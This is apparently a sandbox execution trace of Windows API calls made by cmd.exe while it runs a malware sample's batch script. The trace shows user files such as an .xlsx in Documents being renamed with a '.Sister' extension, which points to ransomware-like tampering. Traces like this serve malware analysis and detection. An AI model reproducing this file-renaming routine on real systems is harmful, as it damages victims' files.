lpNumberOfCharsWritten=0xa6cf4fddc8*=0x1a) returned 1 [0306.271] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.271] GetFileType (hFile=0x50) returned 0x2 [0306.271] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0306.271] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0306.271] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.272] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d397a0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x21ed8d397a0*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x3) returned 1 [0306.274] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe098 | out: _Buffer=" \"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister\" \"CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.bat\" ") returned 144 [0306.274] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.274] GetFileType (hFile=0x50) returned 0x2 [0306.274] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0306.274] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe028 | out: lpMode=0xa6cf4fe028) returned 1 [0306.274] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.274] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x90, lpNumberOfCharsWritten=0xa6cf4fe068, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe068*=0x90) returned 1 [0306.279] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe0c8 | out: _Buffer="\r\n") returned 2 [0306.279] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.279] GetFileType (hFile=0x50) returned 0x2 [0306.279] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0306.280] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0306.280] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.280] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x2) returned 1 [0306.290] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde10, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0306.290] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0306.291] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0306.291] malloc (_Size=0xffce) returned 0x21eda35fb40 [0306.291] ??_V@YAXPEAX@Z () returned 0x21eda35fb40 [0306.291] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0306.291] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0306.291] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0306.291] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0306.291] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0306.291] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0306.291] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0306.291] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0306.291] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0306.291] ??_V@YAXPEAX@Z () returned 0x1 [0306.291] GetProcessHeap () returned 0x21ed8c70000 [0306.291] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d5fe40 [0306.291] GetProcessHeap () returned 0x21ed8c70000 [0306.291] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d5fe40, Size=0x130) returned 0x21ed8d2cb90 [0306.292] GetProcessHeap () returned 0x21ed8c70000 [0306.292] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d2cb90) returned 0x130 [0306.292] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0306.292] malloc (_Size=0xffce) returned 0x21eda35fb40 [0306.292] ??_V@YAXPEAX@Z () returned 0x21eda35fb40 [0306.292] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0306.292] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x21eda35fb40, nVolumeNameSize=0x7fe7, lpVolumeSerialNumber=0xa6cf4fd960, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xa6cf4fd960*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0306.294] ??_V@YAXPEAX@Z () returned 0x1 [0306.294] GetProcessHeap () returned 0x21ed8c70000 [0306.294] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x138) returned 0x21ed8d2dd10 [0306.294] GetProcessHeap () returned 0x21ed8c70000 [0306.294] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d5f980 [0306.294] GetProcessHeap () returned 0x21ed8c70000 [0306.294] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d5f980, Size=0x130) returned 0x21ed8d2cf50 [0306.294] GetProcessHeap () returned 0x21ed8c70000 [0306.294] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d2cf50) returned 0x130 [0306.295] malloc (_Size=0xffce) returned 0x21eda35fb40 [0306.295] ??_V@YAXPEAX@Z () returned 0x21eda35fb40 [0306.295] GetProcessHeap () returned 0x21ed8c70000 [0306.295] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8d65c50 [0306.295] GetProcessHeap () returned 0x21ed8c70000 [0306.295] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed948a270 [0306.295] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0306.295] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0306.295] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0306.295] GetLastError () returned 0x2 [0306.295] GetProcessHeap () returned 0x21ed8c70000 [0306.295] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed948bda0 [0306.296] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed948bdb0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents") returned 0x19 [0306.296] SetErrorMode (uMode=0x0) returned 0x0 [0306.296] SetErrorMode (uMode=0x1) returned 0x0 [0306.296] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", nBufferLength=0x7fe7, lpBuffer=0x21eda35fb40, lpFilePart=0xa6cf4fd230 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", lpFilePart=0xa6cf4fd230*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister") returned 0x54 [0306.296] SetErrorMode (uMode=0x0) returned 0x1 [0306.296] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0306.296] GetProcessHeap () returned 0x21ed8c70000 [0306.296] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed948a4e0 [0306.296] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0306.296] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0306.296] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0306.296] GetLastError () returned 0x2 [0306.296] ??_V@YAXPEAX@Z () returned 0x1 [0306.297] malloc (_Size=0xffce) returned 0x21eda35fb40 [0306.297] ??_V@YAXPEAX@Z () returned 0x21eda35fb40 [0306.297] malloc (_Size=0xffce) returned 0x21eda36fb20 [0306.297] ??_V@YAXPEAX@Z () returned 0x21eda36fb20 [0306.297] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0306.297] GetLastError () returned 0x2 [0306.297] _get_osfhandle (_FileHandle=2) returned 0x54 [0306.297] GetFileType (hFile=0x54) returned 0x2 [0306.297] GetStdHandle (nStdHandle=0xfffffff4) returned 0x54 [0306.297] GetConsoleMode (in: hConsoleHandle=0x54, lpMode=0xa6cf4fd378 | out: lpMode=0xa6cf4fd378) returned 1 [0306.299] _get_osfhandle (_FileHandle=2) returned 0x54 [0306.299] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x54, lpConsoleScreenBufferInfo=0xa6cf4fd3b0 | out: lpConsoleScreenBufferInfo=0xa6cf4fd3b0) returned 1 [0306.300] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0306.300] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0xa6cf4fd450 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0306.300] WriteConsoleW (in: hConsoleOutput=0x54, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0xa6cf4fd3a0, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fd3a0*=0x2c) returned 1 [0306.306] longjmp () [0306.306] ??_V@YAXPEAX@Z () returned 0x1 [0306.306] FindNextFileW (in: hFindFile=0x21ed8c7cf40, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x737537e0, ftCreationTime.dwHighDateTime=0x1d56c6b, ftLastAccessTime.dwLowDateTime=0x33b03750, ftLastAccessTime.dwHighDateTime=0x1d5b779, ftLastWriteTime.dwLowDateTime=0x33b03750, ftLastWriteTime.dwHighDateTime=0x1d5b779, nFileSizeHigh=0x0, nFileSizeLow=0x417a, dwReserved0=0xa0000003, dwReserved1=0xe68ac9ea, cFileName="ZAZiikQ05Ny2stgiO-.xlsx", cAlternateFileName="")) returned 1 [0306.306] GetProcessHeap () returned 0x21ed8c70000 [0306.306] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c758a0, Size=0x312) returned 0x21ed8c758a0 [0306.306] GetProcessHeap () returned 0x21ed8c70000 [0306.306] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c758a0) returned 0x312 [0306.307] GetProcessHeap () returned 0x21ed8c70000 [0306.307] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d39c70 [0306.307] GetProcessHeap () returned 0x21ed8c70000 [0306.307] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d39c70, Size=0x30) returned 0x21ed8d39c70 [0306.307] GetProcessHeap () returned 0x21ed8c70000 [0306.307] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d39c70) returned 0x30 [0306.307] GetProcessHeap () returned 0x21ed8c70000 [0306.307] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d39cb0 [0306.307] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0306.307] GetProcessHeap () returned 0x21ed8c70000 [0306.307] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x40) returned 0x21ed8c7bdf0 [0306.307] ??_V@YAXPEAX@Z () returned 0x1 [0306.308] GetProcessHeap () returned 0x21ed8c70000 [0306.308] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d39cb0, Size=0x1f0) returned 0x21ed8d39cb0 [0306.308] GetProcessHeap () returned 0x21ed8c70000 [0306.308] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d39cb0) returned 0x1f0 [0306.308] GetProcessHeap () returned 0x21ed8c70000 [0306.308] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d39eb0 [0306.308] GetProcessHeap () returned 0x21ed8c70000 [0306.308] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d39eb0, Size=0x290) returned 0x21ed8d39eb0 [0306.308] GetProcessHeap () returned 0x21ed8c70000 [0306.308] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d39eb0) returned 0x290 [0306.308] GetProcessHeap () returned 0x21ed8c70000 [0306.308] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d3a150 [0306.308] GetProcessHeap () returned 0x21ed8c70000 [0306.308] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d3a150, Size=0x30) returned 0x21ed8d3a150 [0306.308] GetProcessHeap () returned 0x21ed8c70000 [0306.308] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d3a150) returned 0x30 [0306.308] GetProcessHeap () returned 0x21ed8c70000 [0306.308] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d3a190 [0306.308] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0306.309] GetProcessHeap () returned 0x21ed8c70000 [0306.309] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x40) returned 0x21ed8c7ba80 [0306.309] ??_V@YAXPEAX@Z () returned 0x1 [0306.309] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0306.309] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x7, cFileName="Users", cAlternateFileName="")) returned 0x21ed8d65bf0 [0306.309] FindClose (in: hFindFile=0x21ed8d65bf0 | out: hFindFile=0x21ed8d65bf0) returned 1 [0306.309] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x7, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8d65710 [0306.310] FindClose (in: hFindFile=0x21ed8d65710 | out: hFindFile=0x21ed8d65710) returned 1 [0306.310] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xe1265a02, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xe1265a02, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x7, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 0x21ed8d65b90 [0306.310] FindClose (in: hFindFile=0x21ed8d65b90 | out: hFindFile=0x21ed8d65b90) returned 1 [0306.310] _wcsnicmp (_String1="DOCUME~1", _String2="Documents", _MaxCount=0x9) returned 16 [0306.310] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\ZAZiikQ05Ny2stgiO-.xlsx", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x737537e0, ftCreationTime.dwHighDateTime=0x1d56c6b, ftLastAccessTime.dwLowDateTime=0x33b03750, ftLastAccessTime.dwHighDateTime=0x1d5b779, ftLastWriteTime.dwLowDateTime=0x33b03750, ftLastWriteTime.dwHighDateTime=0x1d5b779, nFileSizeHigh=0x0, nFileSizeLow=0x417a, dwReserved0=0x4, dwReserved1=0x7, cFileName="ZAZiikQ05Ny2stgiO-.xlsx", cAlternateFileName="ZAZIIK~1.XLS")) returned 0x21ed8d65e30 [0306.310] FindClose (in: hFindFile=0x21ed8d65e30 | out: hFindFile=0x21ed8d65e30) returned 1 [0306.311] _wcsnicmp (_String1="ZAZIIK~1.XLS", _String2="ZAZiikQ05Ny2stgiO-.xlsx", _MaxCount=0x17) returned 13 [0306.311] malloc (_Size=0x1ff9c) returned 0x21eda37fb00 [0306.312] ??_V@YAXPEAX@Z () returned 0x21eda37fb00 [0306.313] GetProcessHeap () returned 0x21ed8c70000 [0306.313] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x36) returned 0x21ed8cc8a90 [0306.314] ??_V@YAXPEAX@Z () returned 0x1 [0306.314] ??_V@YAXPEAX@Z () returned 0x1 [0306.314] GetProcessHeap () returned 0x21ed8c70000 [0306.314] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d3a190, Size=0x1e8) returned 0x21ed8d3a190 [0306.314] GetProcessHeap () returned 0x21ed8c70000 [0306.314] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d3a190) returned 0x1e8 [0306.314] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0306.314] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.314] GetFileType (hFile=0x50) returned 0x2 [0306.314] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0306.314] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0306.315] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.315] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0306.322] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents") returned 0x19 [0306.322] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Documents") returned 25 [0306.322] _vsnwprintf (in: _Buffer=0x21ed8e80192, _BufferCount=0x83cc, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0306.322] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.322] GetFileType (hFile=0x50) returned 0x2 [0306.322] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0306.322] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0306.322] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.323] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x1a) returned 1 [0306.323] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.323] GetFileType (hFile=0x50) returned 0x2 [0306.323] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0306.323] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0306.324] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.324] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d39c80*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed8d39c80*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0306.324] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"ZAZiikQ05Ny2stgiO-.xlsx\" \"ZAZiikQ05Ny2stgiO-.xlsx.Sister\" ") returned 60 [0306.324] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.324] GetFileType (hFile=0x50) returned 0x2 [0306.324] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0306.324] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0306.325] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.325] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3c, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3c) returned 1 [0306.325] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe558 | out: _Buffer=" & ") returned 3 [0306.325] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.325] GetFileType (hFile=0x50) returned 0x2 [0306.326] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0306.326] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0306.326] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.326] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0306.326] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0xa6cf4fe528 | out: _Buffer="for") returned 3 [0306.326] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.326] GetFileType (hFile=0x50) returned 0x2 [0306.327] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0306.327] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0306.327] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.327] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3) returned 1 [0306.327] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" %a in ") returned 7 [0306.327] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.327] GetFileType (hFile=0x50) returned 0x2 [0306.327] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0306.328] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0306.328] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.328] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x7) returned 1 [0306.328] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0xa6cf4fe528 | out: _Buffer="(\"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe\") do ") returned 85 [0306.328] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.328] GetFileType (hFile=0x50) returned 0x2 [0306.328] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0306.329] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0306.329] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.329] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x55, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x55) returned 1 [0306.335] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.335] GetFileType (hFile=0x50) returned 0x2 [0306.335] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0306.335] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0306.336] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.336] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d3a160*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed8d3a160*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0306.337] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"ZAZiikQ05Ny2stgiO-.xlsx.Sister\" \"ZAZiikQ05Ny2stgiO-.bat\" ") returned 59 [0306.337] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.337] GetFileType (hFile=0x50) returned 0x2 [0306.337] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0306.337] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0306.337] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.337] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3b, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3b) returned 1 [0306.342] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0306.342] _get_osfhandle (_FileHandle=1) returned 0x50 [0306.342] GetFileType 